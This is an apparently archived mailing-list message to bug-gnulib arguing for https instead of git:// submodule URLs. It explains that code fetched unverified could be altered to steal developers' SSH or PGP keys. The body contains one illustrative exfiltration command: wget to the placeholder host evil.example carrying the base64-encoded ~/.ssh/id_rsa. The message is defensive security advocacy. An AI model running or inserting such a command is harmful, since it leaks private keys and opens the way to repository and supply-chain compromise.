From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: X-Spam-Checker-Version: SpamAssassin 3.4.2 (2018-09-13) on dcvr.yhbt.net X-Spam-Level: X-Spam-Status: No, score=-3.9 required=3.0 tests=AWL,BAYES_00,DKIM_INVALID, DKIM_SIGNED,MAILING_LIST_MULTI,RCVD_IN_DNSWL_MED,RCVD_IN_MSPIKE_H4, RCVD_IN_MSPIKE_WL,SPF_HELO_PASS,SPF_PASS shortcircuit=no autolearn=ham autolearn_force=no version=3.4.2 Received: from lists.gnu.org (lists.gnu.org [209.51.188.17]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (No client certificate requested) by dcvr.yhbt.net (Postfix) with ESMTPS id 9A32F1F4B4 for ; Sun, 10 Jan 2021 12:20:40 +0000 (UTC) Received: from localhost ([::1]:33694 helo=lists1p.gnu.org) by lists.gnu.org with esmtp (Exim 4.90_1) (envelope-from ) id 1kyZi3-0000a9-BQ for normalperson@yhbt.net; Sun, 10 Jan 2021 07:20:39 -0500 Received: from eggs.gnu.org ([2001:470:142:3::10]:47926) by lists.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1kyZhr-0000a1-R8 for bug-gnulib@gnu.org; Sun, 10 Jan 2021 07:20:27 -0500 Received: from uggla.sjd.se ([2001:9b1:8633::107]:52698) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1kyZhl-00060C-9I for bug-gnulib@gnu.org; Sun, 10 Jan 2021 07:20:27 -0500 DKIM-Signature: v=1; a=ed25519-sha256; q=dns/txt; c=relaxed/relaxed; d=josefsson.org; s=ed20b09; h=Content-Type:MIME-Version:Message-ID: In-Reply-To:Date:References:Subject:To:From:Sender:Reply-To:Cc: Content-Transfer-Encoding:Content-ID:Content-Description:Resent-Date: Resent-From:Resent-Sender:Resent-To:Resent-Cc:Resent-Message-ID:List-Id: List-Help:List-Unsubscribe:List-Subscribe:List-Post:List-Owner:List-Archive; bh=Id+pw9kZHQv7m8EP4ofuSvrwE7e9bYkrHSNDc2PkzXU=; b=y1spJnlWpSk2d0aFwmzCq2fhM LMPLcxddKoccaKKVW857x9oR7ABHwkD0VvYXNkYnubyH+2yl9XNTzU3LjvBDw==; DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=josefsson.org; s=rsa20b09; h=Content-Type:MIME-Version:Message-ID: In-Reply-To:Date:References:Subject:To:From:Sender:Reply-To:Cc: Content-Transfer-Encoding:Content-ID:Content-Description:Resent-Date: Resent-From:Resent-Sender:Resent-To:Resent-Cc:Resent-Message-ID:List-Id: List-Help:List-Unsubscribe:List-Subscribe:List-Post:List-Owner:List-Archive; bh=Id+pw9kZHQv7m8EP4ofuSvrwE7e9bYkrHSNDc2PkzXU=; b=aFTN96EoMn9s9bcNLE9zt88fi 632s1LlBvpTqRfEdLsJFAA09bhBJZ80f1E039hPo6KzWzSqrH+nZ7xttwjEhfQaLnb1NOp9YJCfJU Nx/Tf+2ougz5pQtOmW8TzORH2rB1qOevftGo8CvBOpFuOTcKodZUyFtN87wXzmo/AKxr4xoKPbfOd 4pe958h94PvGtF0KqQE9xTkD5CjbR9CYe9s/AQqr61Y8oo58/5zH/yh+Z2XMs5eNK0FfXlLWE/6g7 uOpKVktLTNifEXaA5LwH/9NvbTfooQbT+MuG8CRiKAPaWbnImgajDhzqYHLCXHldu4uYN4mNKNDo8 fP1ViFeWXCKm6qSgvZB7ceTxz9+8piZiIZ+3W4yh/J5VmnDeUG+h05I90mdC9dVh09yjID2FTR2uW WG2WghzQDFY1VxG+ZBduV16yGwlNdQawWo8XM5pTFX6DKL; Received: from 31-208-42-58.cust.bredband2.com ([31.208.42.58]:58490 helo=latte) by uggla.sjd.se with esmtpsa (TLS1.3:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.92) (envelope-from ) id 1kyZhg-0004m7-So for bug-gnulib@gnu.org; Sun, 10 Jan 2021 12:20:18 +0000 To: bug-gnulib@gnu.org Subject: Re: [PATCH] Use https:// instead of git://. References: <878s91vei4.fsf@latte.josefsson.org> <11756592.SzArdBrhr3@omega> <87wnwlt715.fsf@latte.josefsson.org> OpenPGP: id=B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE; url=https://josefsson.org/key-20190320.txt X-Hashcash: 1:22:210110:bug-gnulib@gnu.org::TtdmsIdRc+gkbY6P:44nV Date: Sun, 10 Jan 2021 13:20:16 +0100 In-Reply-To: <87wnwlt715.fsf@latte.josefsson.org> (Simon Josefsson via Gnulib discussion list's message of "Sun, 10 Jan 2021 11:34:14 +0100") Message-ID: <87sg79t24f.fsf@latte.josefsson.org> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/26.1 (gnu/linux) MIME-Version: 1.0 Content-Type: multipart/signed; boundary="=-=-="; micalg=pgp-sha256; protocol="application/pgp-signature" X-uggla-rspamd: ----- Score: -5.2 Action: no action Symbol: ARC_NA(0.00) Symbol: RCVD_VIA_SMTP_AUTH(0.00) Symbol: FROM_HAS_DN(0.00) Symbol: TO_MATCH_ENVRCPT_ALL(0.00) Symbol: MIME_GOOD(-0.20) Symbol: TO_DN_NONE(0.00) Symbol: RCPT_COUNT_ONE(0.00) Symbol: MID_RHS_MATCH_FROMTLD(0.00) Symbol: RCVD_COUNT_ONE(0.00) Symbol: SIGNED_PGP(-2.00) Symbol: FROM_EQ_ENVFROM(0.00) Symbol: MIME_TRACE(0.00) Symbol: ASN(0.00) Symbol: RCVD_TLS_ALL(0.00) Symbol: BAYES_HAM(-3.00) Message-ID: 87sg79t24f.fsf@latte.josefsson.org Received-SPF: pass client-ip=2001:9b1:8633::107; envelope-from=simon@josefsson.org; helo=uggla.sjd.se X-Spam_score_int: -20 X-Spam_score: -2.1 X-Spam_bar: -- X-Spam_report: (-2.1 / 5.0 requ) BAYES_00=-1.9, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, DKIM_VALID_AU=-0.1, DKIM_VALID_EF=-0.1, SPF_HELO_PASS=-0.001, SPF_PASS=-0.001 autolearn=ham autolearn_force=no X-Spam_action: no action X-BeenThere: bug-gnulib@gnu.org X-Mailman-Version: 2.1.23 Precedence: list List-Id: Gnulib discussion list List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: bug-gnulib-bounces+normalperson=yhbt.net@gnu.org Sender: "bug-gnulib" Reply-to: Simon Josefsson From: Simon Josefsson via Gnulib discussion list --=-=-= Content-Type: text/plain I had a walk and realized it might be better to think of the problem like this. Consider if someone wants to volunteer to do a new gettext release, they would go to https://savannah.gnu.org/git/?group=gettext which properly suggest to checkout over https or SSH. After reading HACKING the person performs runs ./gitsub.sh pull which prints: Submodule 'gnulib' (git://git.sv.gnu.org/gnulib.git) registered for path 'gnulib' Cloning into '/home/jas/src/gettext/gnulib'... and then continues to run ./autogen.sh which invokes gnulib-tool from the newly checkout. Since the git:// protocol does not offer security, the gnulib-tool could be modified on the way to do something evil like: wget -q -O /dev/null https://evil.example/`base64 -w0 < ~/.ssh/id_rsa` Your SSH key might be encrypted, but the password can be cracked offline. After this, they have write access to the savannah git repository. I'm sure similar attacks can be done against ./bootstrap, and to send the GnuPG key instead if you want to fake signed tarballs instead of gaining write access to the repository. Knowing the SSH/PGP key of key GNU developers enables someone to mount further attacks, and gaining this ability is attractive to a number of actors with funding. Of course, there may be details I'm missing that prevents the exact logic I'm describing to work. The core of the problem is: gnulib encourage developers to run scripts from remote unverified sources. Using https:// instead of git:// makes this slightly better. Using https has its own set of problems, but none that warrants ignoring the initial concern. I wish everyone would use a hardware SSH/PGP key device, to make these attacks harder. I have my SSH/PGP on a GNUK device: https://blog.josefsson.org/2019/03/21/planning-for-a-new-openpgp-key/ You can buy them from the FSF: https://shop.fsf.org/storage-devices/neug-usb-true-random-number-generator Upgrade them to run GNUK like this: https://blog.josefsson.org/2019/03/21/installing-gnuk-on-fst-01g-running-neug/ /Simon --=-=-= Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- iHUEARYIAB0WIQSjzJyHC50xCrrUzy9RcisI/kdFogUCX/rxAAAKCRBRcisI/kdF orcfAQDVv3+oKuy0L8chHZG8o+IiVZ2S/910brcx2/aQwucgGAD/TNHmes9bEdxn VMDMKDTqSkd1hd6hU7POUV8vKrF7UwY= =TEvu -----END PGP SIGNATURE----- --=-=-=--